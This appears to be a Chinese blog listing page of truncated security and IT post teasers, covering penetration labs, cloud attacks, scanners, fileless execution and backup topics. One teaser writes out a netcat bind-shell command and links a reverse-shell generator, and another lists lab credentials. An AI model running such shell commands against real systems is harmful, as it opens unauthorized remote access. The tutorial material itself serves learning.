XshellPlus 是一款将 Xshell 和 Xftp 打包在一起的强大远程管理工具，结合了 Xshell 和 Xftp 的所有功能，提供更高效的远程控制和文件传输体验。目前xshell个人用户已经可以免费使用，官方已经推出个人版！ 什么是 XshellPlus？ XshellPlus 是一款集 ...

Nmap是一个非常用的网络/端口扫描工具，如果想将nmap集成进你的工具里。可以使用python-nmap这个python库，它提供了一个简单的接口来使用nmap进行扫描。 ...

综合渗透-学习三层网络渗透及综合渗透概念 学习：​【进来学习】手把手教你三层网络综合渗透 DMZ服务器账号密码：administrator/P@ssw0rd1 二层服务器账号密码：dmz/P@ssw0rd2 三层服务器账号密码：pro/P@ssw0rd3 请确保安装盘硬盘容量大于15G 任务要求： ...

知识点: 1、云服务-对象存储-权限配置不当 2、云服务-对象存储-域名解析接管 3、云服务-对象存储-AccessKey泄漏 章节点： 云场景攻防：公有云，私有云，混合云，虚拟化集群，云桌面等 云厂商攻防：阿里云，腾讯云，华为云，亚马云，谷歌云，微软云等 云服务攻防：对象存储，云数据库，弹性计算服 ...

1. 恢复站点 1.1. 恢复站点是一个真实或虚拟的地点，用来在计算环境遭到灾难时取代该环境 1.2. 当年的恢复站点总是由另一个数据中心充当，而且那个数据中心最好离你们目前的这个比较远 1.3. 现在一般都不采用实体的数据中心了，而且这个恢复站点一般也不会由你们的组织所拥有 1.4. 选定恢复站点 ...

1. DR是必不可少的 1.1. DR（灾难恢复）对于大多数组织来说并不是一个可做可不做的选项，它是一个必须得到满足的需求 1.2. 认为自身受到灾害袭击的概率比较小 1.2.1. 如果是在自然灾害或恐怖袭击频发的地区，那么这种概率肯定会稍高一些 1.2.2. 许多组织都认为它们的运气足够好，不太可 ...

1. 档案系统 1.1. 档案系统是一种你们或许要用到，但目前很可能还不具备的数据保护系统 1.2. 档案定义成一种单独存放于其他位置的数据副本，它是供参考用的，其中有足够的元数据（metadata，即工作数据）​，让用户能够通过这些元数据搜索到想要查询的内容，而无须知道这些内容以前来自何处 1.3 ...

前言 大学的时候也写过和Ingram差不多的工具，不过那时候已经玩到没有兴致了，代码已不知道哪里去。没想到在Github看到了这个工具，实现思路和我的几乎一样，互联网就是这么神奇。 Ingram的Github：https://github.com/jorhelp/Ingram 本着不能让服务器闲着的 ...

wireshark 抓到的包想要进一步分析，如何保存成本地二进制文件？它导出的十六进制如何“喂”给 xxd？且听我一一道来 ...

首先编写一个android测试程序 功能：校验用户名和注册码，成功则弹出注册成功提示 以下仅给出关键部分的代码 res/layout/activity_main.xml <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:androi ...

1. 即时恢复的备份方案 1.1. 即时恢复，就是在文件、文件系统、数据库、虚拟机或应用程序遭到损坏之后，无须经历某种恢复流程就可以将其立刻恢复出来 1.2. 适合用在对RTO要求很严的场合 1.3. 最常见的即时恢复方案就是从快照里面恢复，只需要一条命令即可把快照提升为正本 1.3.1. 根本不需 ...

dirsearch介绍 dirsearch是一款开源的、基于Python开发的命令行工具，主要用于对Web服务器进行目录和文件的扫描，以发现潜在的安全漏洞。 dirsearch下载地址： https://github.com/maurosoria/dirsearch 运行环境：必须安装python3 ...

声明：本文主要用作技术分享，所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险，并遵循相关法律法规。 @目录python 等脚本语言示例演示golang 等静态编译型语言内存文件系统memfd_create 使用示例 python 等脚本语言 通过将power ...

知识点： 1、远程漏扫-Nessus&Nexpose&Goby 2、本地漏扫(提权)-Wesng&Tiquan&Suggester 3、利用场景-远程利用&本地利用&利用条件 一、演示案例-操作系统-远程漏扫-Nessus&Nexpose&Goby Nessus Nessus号称是世界上最流行的漏洞 ...

1. 物联网 1.1. 边缘设备(edge device)通常是指远程站点里的服务器，这几年也用来指代智能手机与平板计算机 1.2. 物联网是边缘运算（edge computing，也叫边缘计算）的一个子集 1.2.1. 所连接的设备在本组织的数据环境里处于相当边缘的地位 1.2.2. 所连接的设备 ...

Shell脚本 建立一个sh脚本 touch 1.sh (新建脚本文件)vi 1.sh（编写文件内容）按 i 可以写入内容，按esc :wq退出并保存 解释 1、创建脚本文件 2、脚本文件中第一行为指定脚本编译器：# !/bin/bash 最终调用的都是dash 执行shell脚本命令： 1、./1 ...

声明：本文主要用作技术分享，所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险，并遵循相关法律法规。 目录完整示例注意事项演示 无文件落地执行（fileless execution）是一种技术，用于避免在磁盘上留下文件痕迹，使得恶意行为更难被检测到。Power ...

1. 混合云平台里的数据 1.1. 许多计算环境采用的都是混合云(hybrid cloud)模型，这种模型会把适合放在云端处理的任务移动到云端，同时把那些适合在本地处理的任务留在数据中心 1.2. NFS/SMB网关 1.2.1. 最经典的混合云产品，就是那种通常称为云网关(cloud gatewa ...

网络抓包这个话题，有一定开发经验的多少都有所了解，常用软件Wireshark，Fiddler用起来也非常傻瓜，本文不会涉及。 一般的介绍网络抓包的文章，到能抓到数据包通常就结束了。但显然认识工具是一会儿事儿，理解本质，清楚实践中啥时候该用，是另外一会儿事儿。让新人小白自行举一反三，可能多少有些困难。... ...

一、实用案例：反弹Shell命令-解决数据回显&解决数据通讯 命令生成：https://forum.ywhack.com/shell.php 环境 1.正向连接：本地监听等待对方连接 Linux控制Windows //绑定CMD到本地5566端口 nc -e cmd -lvp 5566 //主动连接 ...